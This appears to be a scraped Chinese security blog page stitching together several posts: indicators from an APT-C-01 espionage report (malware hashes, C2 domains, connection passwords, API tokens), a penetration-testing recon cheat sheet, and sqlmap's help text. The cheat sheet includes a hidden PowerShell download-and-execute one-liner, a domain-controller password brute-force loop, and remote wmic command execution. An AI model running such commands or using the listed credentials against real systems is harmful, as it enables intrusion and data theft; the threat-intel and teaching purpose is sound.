类型	        MD5                             	文件名	                                        病毒名
邮件附件	954f50f7ed8b4c11b59560769de0ec36	关于推荐第十三届中国青年科技奖候选人的通知.rar	Dropper.Win32.FakeDoc
压缩包内PE	8c9670fbe68ab8719077d480242e6b9e	关于推荐第十三届中国青年科技奖候选人的通知.exe	Dropper.Win32.FakeDoc
释放的PE	6a37ce66d3003ebf04d249ab049acb22	svchoct.exe	                                Backdoor.Win32.HttpBot

954f50f7ed8b4c11b59560769de0ec36

cbeebf063f914eb3b5eba8b37302189f

ae004a5d4f1829594d830956c55d6ae4

https://technet.microsoft.com/zh-cn/library/security/ms12-027.aspx  http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158

”Software\Microsoft\Office\12.0\Word\Resiliency\DisabledItems”"Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems”"Software\Microsoft\Office\11.0\Word\Resiliency\DocumentRecovery”"Software\Microsoft\Office\11.0\Word\Resiliency\DisabledItems”"Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems”

https://technet.microsoft.com/zh-cn/library/security/ms14-060.aspx  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4114

https://technet.microsoft.com/zh-cn/library/security/3010060.aspxhttps://technet.microsoft.com/zh-cn/library/security/ms14-064.aspx  http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6352

da807804fa5f53f7cbcaac82b901689c

19f967e27e21802fe92bc9705ae0a770

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759

5d0b4cadfb149695d9fbc71dd1b36bef

MD5	                                ID	密码
d61c583eba31f2670ae688af070c87fc	14	926
26d7f7aa3135e99581119f40986a8ac3	14	8613
5ee2958b130f9cda8f5f3fc1dc5249cf	4	#My43@92
7639ed0f0c0f5ac48ec9a548a82e2f50	1013	@1234@
250c9ec3e77d1c6d999ce782c69fc21b	avex	admin
f3ed0632cadd2d6beffb9d33db4188ed	w6U900	admin
9b925250786571058dae5a7cbea71d28	zhan	ftp1234
ae004a5d4f1829594d830956c55d6ae4	zhan2	ftp1234
fccb13c00df25d074a78f1eeeb04a0e7	zhan2	ftp1234
a73d3f749e42e2b614f89c4b3ce97fe1	009-4	ftp443
785b24a55dd41c94060efe8b39dc6d4c	120707	hook32wins
36c23c569205d6586984a2f6f8c3a39e	90518	kkbox55
81e1332d15b29e8a19d0e97459d0a1de	90518	kkbox55
7c498b7ad4c12c38b1f4eb12044a9def	motices	ps135790
ca663597299b1cecaf57c14c6579b23b	010-4	ps1478
76782ecf9684595dbf86e5e37ba95cc8	13099	updatewin
c31549489bf0478ab4c367c563916ada	0314–Good	updatewin

行动ID	  上线域名          	        端口	  上线密码	互斥体
2017	  office.go.dyndns.org	        5566	!@#3432!@#@!	)!VoqA.I4
bing	  zxcv201789.dynssl.com         8088	zxc5566 	)!VoqA.I4
ding1	  microsoftword.serveuser.com	53	1wd3wa$RFGHY^%$	)!VoqA.I4
ding2	  uswebmail163.sendsmtp.com	53	1wd3wa$RFGHY^%$	)!VoqA.I4
geiwoaaa  geiwoaaa.qpoe.com	        443	wyaaa8  	)!VoqA.I4
jin_1	  hy-zhqopin.mynumber.org	80	HK#mq6!Z+.	)!VoqA.I4
jin_2	  bearingonly.rebatesrule.net	53	~@FA<9p2c*	)!VoqA.I4
justdied  www.service.justdied.com	80	ppt.168@	)!VoqA.I4
pouhui	  pouhui.diskstation.org	53	index#help	)!VoqA.I4
tina_1	  fevupdate.ocry.com    	80	168168  	)!VoqA.I4
tina_2	  wmiaprp.ezua.com	        53	116688  	)!VoqA.I4
tony_1	  winsysupdate.dynamic-dns.net	80	0A@2q60#21	)!VoqA.I4
tony_2	  officepatch.dnset.com	        53	aZ!@2q6U0#	)!VoqA.I4

soagov.sytes.netsoagov.zapto.orgsoasoa.sytes.net

client_id                           client_secret	                        refresh_token
Token1	    3edfe684ded31a7cca6378c0226f5629	bfa89eebf29032076e9cffb75549fee5	75cdc35b1cdaee24047f3afb23a5ccce
Token2	    7a5691b81bf4322fd88f5fa99407fbbc	d44cfa7dd3c852b69c59efacf766cc23	14b6685330bf32a22688910e765b5dce

https://www.virustotal.com/en/file/8cee670d7419d1fd0f8f0ac6a2bd981593c2c96ca0f6b8019317cf556337cfa8/analysis/

03d762794a6fe96458d8228bb7561629

0595f5005f237967dcfda517b26497d6

07561810d818905851ce6ab2c1152871

0e80fca91103fe46766dcb0763c6f6af

1374e999e1cda9e406c19dfe99830ffc

1396cafb08ca09fac5d4bd2f12c65059

1ab54f5f0b847a1aaaf00237d3a9f0ba

1aca8cd40d9b84cab225d333b09f9ba5

1dc61f30feeb60995174692e8d864312

250c9ec3e77d1c6d999ce782c69fc21b

2579b715ea1b76a1979c415b139fdee7

26d7f7aa3135e99581119f40986a8ac3

27f683baed7b02927a591cdc0c850743

28e4545e9944eb53897ee9acf67b1969

2a96042e605146ead06b2ee4835baec3

2c405d608b600655196a4aa13bdb3790

30866adc2976704bca0f051b5474a1ee

31c81459c10d3f001d2ccef830239c16

3484302809ac3df6ceec857cb4f75fb1

36c23c569205d6586984a2f6f8c3a39e

382132e601d7a4ae39a4e7d89457597f

3e12538b6eaf19ca163a47ea599cfa9b

41c7e09170037fafe95bb691df021a20

45e983ae2fca8dacfdebe1b1277102c9

4e57987d0897878eb2241f9d52303713

5696bbee662d75f9be0e8a9ed8672755

5e4c2fbcd0308a0b9af92bf87383604f

5ee2958b130f9cda8f5f3fc1dc5249cf

5f1a1ff9f272539904e25d300f2bfbcc

611cefaee48c5f096fb644073247621c

67d5f04fb0e00addc4085457f40900a2

6a37ce66d3003ebf04d249ab049acb22

6ca3a598492152eb08e36819ee56ab83

7639ed0f0c0f5ac48ec9a548a82e2f50

76782ecf9684595dbf86e5e37ba95cc8

785b24a55dd41c94060efe8b39dc6d4c

7c498b7ad4c12c38b1f4eb12044a9def

81232f4c5c7810939b3486fa78d666c2

81e1332d15b29e8a19d0e97459d0a1de

8abb22771fd3ca34d6def30ba5c5081c

95f0b0e942081b4952e6daef2e373967

9b925250786571058dae5a7cbea71d28

9bcb41da619c289fcfdf3131bbf2be21

9f9a24b063018613f7f290cc057b8c40

a73d3f749e42e2b614f89c4b3ce97fe1

a807486cfe05b30a43c109fdb6a95993

a8417d19c5e5183d45a38a2abf48e43e

acc598bf20fada204b5cfd4c3344f98a

accb53eb0faebfca9f190815d143e04b

adc3a4dfbdfe7640153ed0ea1c3cf125

ae004a5d4f1829594d830956c55d6ae4

b0be3c5fe298fb2b894394e808d5ffaf

b244cced7c7f728bcc4d363f8260090d

b301cd0e42803b0373438e9d4ca01421

bd2272535c655aff1f1566b24a70ee97

bd4b579f889bbe681b9d3ab11768ca07

bfb9d13daf5a4232e5e45875e7e905d7

c31549489bf0478ab4c367c563916ada

c8755d732be4dc13eecd8e4c49cfab94

c8fd2748a82e336f934963a79313aaa1

ca663597299b1cecaf57c14c6579b23b

d12099237026ae7475c24b3dfb5d18bc

d61c583eba31f2670ae688af070c87fc

dde2c03d6168089affdca3b5ec41f661

e2e2cd911e099b005e0b2a80a34cfaac

e9a9c0485ee3e32e7db79247fee8bba6

ec7e11cfca01af40f4d96cbbacb41fed

eff88ecf0c3e719f584371e9150061d2

f0c29f89ffdb0f3f03e663ef415b9e4e

f1b6ed2624583c913392dcd7e3ea6ae1

f27a9cd7df897cf8d2e540b6530dceb3

f29abd84d6cdec8bb5ce8d51e85ddafc

f3ed0632cadd2d6beffb9d33db4188ed

fbd0f2c62b14b576f087e92f60e7d132

fccb13c00df25d074a78f1eeeb04a0e7

0fb92524625fffda3425d08c94c014a1

168365197031ffcdbe65ab13d71b64ec

2b5ddabf1c6fd8670137cade8b60a034

517c81b6d05bf285d095e0fd91cb6f03

7deeb1b3cce6528add4f9489ce1ec5d6

aa57085e5544d923f576e9f86adf9dc0

cda1961d63aaee991ff97845705e08b8

e07ca9f773bd772a41a6698c6fd6e551

fb427874a13f6ea5e0fd1a0aec6a095c

126mailserver.serveftp.com

access.webplurk.com

aliago.dyndns.dk

as1688.webhop.org

babana.wikaba.com

backaaa.beijingdasihei.com

bt0116.servebbs.net

ceepitbj.servepics.com

check.blogdns.com

china.serveblog.net

chinamil.lflink.com

cluster.safe360.dns05.com

cnwww.m-music.net

fff.dynamic-dns.net

gaewaa.upgrinfo.com

givemea.ygto.com

givemeaaa.upgrinfo.com

goldlion.mefound.com

gugupd.008.net

guliu2008.9966.org

hyssjc.securitytactics.com

jason.zyns.com

javainfo.upgrinfo.com

jerry.jkub.com

kav2011.mooo.com

kouwel.zapto.org

laizaow.mefound.com

localhosts.ddns.us

mail.sends.sendsmtp.com

mail163.mypop3.net

mailsends.sendsmtp.com

mediatvset.no-ip.org

moneyaaa.beijingdasihei.com

motices.ourhobby.com

mp3.dnset.com

netlink.vizvaz.com

operater.solaris.nu

pps.longmusic.com

ps1688.webhop.org

rising.linkpc.net

safe360.dns05.com

sandy.ourhobby.com

soagov.sytes.net

soagov.zapto.org

soasoa.sytes.net

ssy.ikwb.com

ssy.mynumber.org

svcsrset.ezua.com

teacat.https443.org

tong.wikaba.com

updates.lflink.com

usa08.serveftp.net

waterfall.mynumber.org

webupdate.dnsrd.com

www.safe360.dns05.com

www.ssy.ikwb.com

www.tong.wikaba.com

wwwdo.tyur.acmetoy.com

xinhua.redirectme.net

131.213.66.10

146.0.32.168

165.227.220.223

188.166.67.36

199.101.133.169

45.32.8.137

45.76.125.176

45.76.228.61

45.76.9.206

45.77.171.209

bearingonly.rebatesrule.net

canberk.gecekodu.com

emailser163.serveusers.com

fevupdate.ocry.com

geiwoaaa.qpoe.com

hy-zhqopin.mynumber.org

l63service.serveuser.com

microsoftword.serveuser.com

office.go.dyndns.org

updateinfo.servegame.org

uswebmail163.sendsmtp.com

winsysupdate.dynamic-dns.net

wmiaprp.ezua.com

www.service.justdied.com

zxcv201789.dynssl.com

officepatch.dnset.com

pouhui.diskstation.org

comehigh.mefound.com

annie165.zyns.com

http://annie165.zyns.com/zxcvb.hta

The post 毒云藤 (APT-C-01)军政情报刺探者揭露 appeared first on 🔰雨苁ℒ🔰.

├─信息收集
│  ├─README
│  ├─如何收集whois信息 
│  └─如何收集dns信息
│  ├─Linux下的信息收集
│  └─Windows下的信息收集

root@wing:~# whois baidu.com
   Domain Name: BAIDU.COM
   Registry Domain ID: 11181110_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.markmonitor.com
   Registrar URL: http://www.markmonitor.com
   Updated Date: 2017-07-28T02:36:28Z
   Creation Date: 1999-10-11T11:05:17Z
   Registry Expiry Date: 2026-10-11T11:05:17Z
   Registrar: MarkMonitor Inc.
   Registrar IANA ID: 292
   Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
   Registrar Abuse Contact Phone: +1.2083895740
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
   Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
   Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
   Name Server: DNS.BAIDU.COM
   Name Server: NS2.BAIDU.COM
   Name Server: NS3.BAIDU.COM
   Name Server: NS4.BAIDU.COM
   Name Server: NS7.BAIDU.COM
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2017-12-10T07:03:24Z <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

攻击模式	方法	                         描述
Websites	Spider default page	扫描默认页面和爬取目标站点
Websites	Certificates	扫描域名证书
Tools
recon-ng 命令	Description
use recon/domains-hosts/baidu_site	通过baidu搜索域名
use recon/domains-hosts/bing_domain_api	通过bing api搜索域名
use recon/domains-hosts/bing_domain_web	通过bing web pages搜索域名
use recon/domains-hosts/brute_hosts	爆破子域名
use recon/domains-hosts/google_site_api	通过google api搜索域名
use recon/domains-hosts/google_site_web	通过 google web pages 搜索域名.
use recon/domains-hosts/netcraft	Search domains from netcraft pages.
dnsrecon 命令	Description
dnsrecon -n 8.8.8.8 -d demo.com	请使用有效的DNS服务器，以避免DNS伪造。
dnsrecon -d demo.com -t std	SOA，NS，A，AAAA，MX和SRV（如果NS服务器上的AXRF失败）。
dnsrecon -d demo.com -t rvl	反向查找给定的CIDR或IP范围。
dnsrecon -d demo.com -t brt -D /path/to/subdomains.wd	使用之指定字典爆破域名和hosts.
dnsrecon -d demo.com -t brt -D /path/to/subdomains.wd --iw	使用指定目录字典暴力破解域名，即使发现了目录，依然继续暴力破解
dnsrecon -d demo.com -t srv	SRV 记录
dnsrecon -d demo.com -t axfr	为空间转移测试所有NS服务器.
dnsrecon -d demo.com -t goo	通过google搜索存活子域和主机.
dnsrecon -d demo.com -t tld	删除给定域的TLD，并针对在IANA中注册的所有TLD进行测试
dnsrecon -d demo.com -t zonewalk	使用NSEC记录执行DNSSEC区域漫游。
dnsrecon -d demo.com --db /path/to/results.sqlite	将结果保存在一个sqlite文件中
dnsrecon -d demo.com --xml /path/to/results.xml	将结果保存在一个xml文件中。
dnsrecon -d demo.com -c /path/to/results.csv	将结果保存在一个csv文件中。
dnsrecon -d demo.com -j /path/to/results.json	将结果保存在一个json文件中。
theHarvester Command	说明
theharvester -d demo.com -b all	通过 google, googleCSE, bing, bingapi, pgp, linkedin,google-profiles, jigsaw, twitter, googleplus,等方法来查询目标信息
theharvester -d demo.com -n	对发现的所有网段执行DNS反向查询
theharvester -d demo.com -c	对域名执行DNS爆破
theharvester -d demo.com -t	执行DNS TLD扩展发现
theharvester -d demo.com -e 8.8.8.8	指定一个DNS服务器
theharvester -d demo.com -h	使用SHODAN数据库查询已发现的主机
Metasploit Command	说明
msf > use auxiliary/gather/enum_dns	收集dns记录信息(A, AAAA, CNAME, ZoneTransfer, SRV, TLD, RVL, ...)

recon-ng 命令	 Description
use recon/domains-hosts/baidu_site	通过baidu搜索域名
use recon/domains-hosts/bing_domain_api	通过bing api搜索域名
use recon/domains-hosts/bing_domain_web	通过bing web pages搜索域名
use recon/domains-hosts/brute_hosts	爆破子域名
use recon/domains-hosts/google_site_api	通过google api搜索域名
use recon/domains-hosts/google_site_web	通过 google web pages 搜索域名.
use recon/domains-hosts/netcraft	Search domains from netcraft pages.

Command	Description
iptables -L	列出所有规则链。
iptables -F	删除选定规则链中的所有规则.
iptables -A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT	请执行iptables -p icmp --help 获得更多信息.
iptables -A INPUT -p tcp -m tcp --sport 80 -m state --state RELATED,ESTABLISHED -j ACCEPT	允许来自src端口80的tcp连接
iptables -A OUTPUT -p tcp -m tcp --dport 80 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT	允许 从/到 dst 端口80的TCP连接.
iptables -A INPUT -p udp -m udp --sport 53 -m state --state RELATED,ESTABLISHED -j ACCEPT	允许来自src端口80的udp连接
iptables -A OUTPUT -p udp -m udp --dport 53 -m state --state NEW,RELATED,ESTABLISHED -j ACCEPT	允许从/到 dst 端口53的udp连接.
iptables -A OUTPUT -p tcp -m tcp --sport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT<BR>iptables -A OUTPUT -p tcp -m tcp --dport 55552 -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT	允许本地主机连接到 localhost:55552

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

find / ( -perm -o w -perm -o x ) -type d 2>/dev/null

find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print

tasklist /FI "IMAGENAME eq cmd.exe"

tasklist /FI "PID ne 0"

net group "Domain Policy Creator Owners" /domain

sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys

wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"

powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"

wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DomainController\IPC$ /user:<DomainName>\%n %p 1>NUL 2>&1 && @echo [*] %n:%p &&

FOR /F %f in ('dir /b /s C:\') do find /I "password" %f

The post 渗透测试 维基百科第一部分 信息收集 Pentest appeared first on 🔰雨苁ℒ🔰.

https://en.wikipedia.org/wiki/Tor_(anonymity_network)#Hidden_services
https://support.dnsimple.com/articles/a-record/
http://www.chinaz.com/web/2015/0121/379846.shtml
https://zhidao.baidu.com/question/1691539939903827828.html

The post 寻找CloudFlare和暗网(tor)背后的真实ip appeared first on 🔰雨苁ℒ🔰.

sqlmap使用手册 暗网网址

sqlmap使用手册

Usage

Usage: python sqlmap.py [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -x SITEMAPURL       Parse target(s) from remote sitemap(.xml) file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target URL

    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST
    --param-del=PARA..  Character used for splitting parameter values
    --cookie=COOKIE     HTTP Cookie header value
    --cookie-del=COO..  Character used for splitting cookie values
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

  Optimization:
    These options can be used to optimize the performance of sqlmap

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS to this value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to this value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-order=S..  Resulting page URL searched for second-order response

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Retrieve DBMS comments
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDECOL       DBMS database table column(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)

  Brute force:
    These options can be used to run brute force checks

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns

  User-defined function injection:
    These options can be used to create custom user-defined functions

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end database management
    system underlying file system

    --file-read=RFILE   Read a file from the back-end DBMS file system
    --file-write=WFILE  Write a local file on the back-end DBMS file system
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters

    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behaviour
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use DBMS hex function(s) for data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap

  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set question answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (non-core) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS/IDS protection
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge-output      Safely remove all content from output directory
    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

Output verbosity

Option: -v

This option can be used to set the verbosity level of output messages. There exist seven levels of verbosity. The default level is 1 in which information, warning, error, critical messages and Python tracebacks (if any occur) are displayed.

• 0: Show only Python tracebacks, error and critical messages.
• 1: Show also information and warning messages.
• 2: Show also debug messages.
• 3: Show also payloads injected.
• 4: Show also HTTP requests.
• 5: Show also HTTP responses’ headers.
• 6: Show also HTTP responses’ page content.

A reasonable level of verbosity to further understand what sqlmap does under the hood is level 2, primarily for the detection phase and the take-over functionalities. Whereas if you want to see the SQL payloads the tools sends, level 3 is your best choice. This level is also recommended to be used when you feed the developers with a potential bug report, make sure you send along with the standard output the traffic log file generated with option -t. In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level 4 or above. It should be noted that there is also a possibility to set the verbosity by using the shorter version of this option where number of letters v inside the provided switch (instead of option) determines the verbosity level (e.g. -v instead of -v 2, -vv instead of -v 3, -vvv instead of -v 4, etc.)

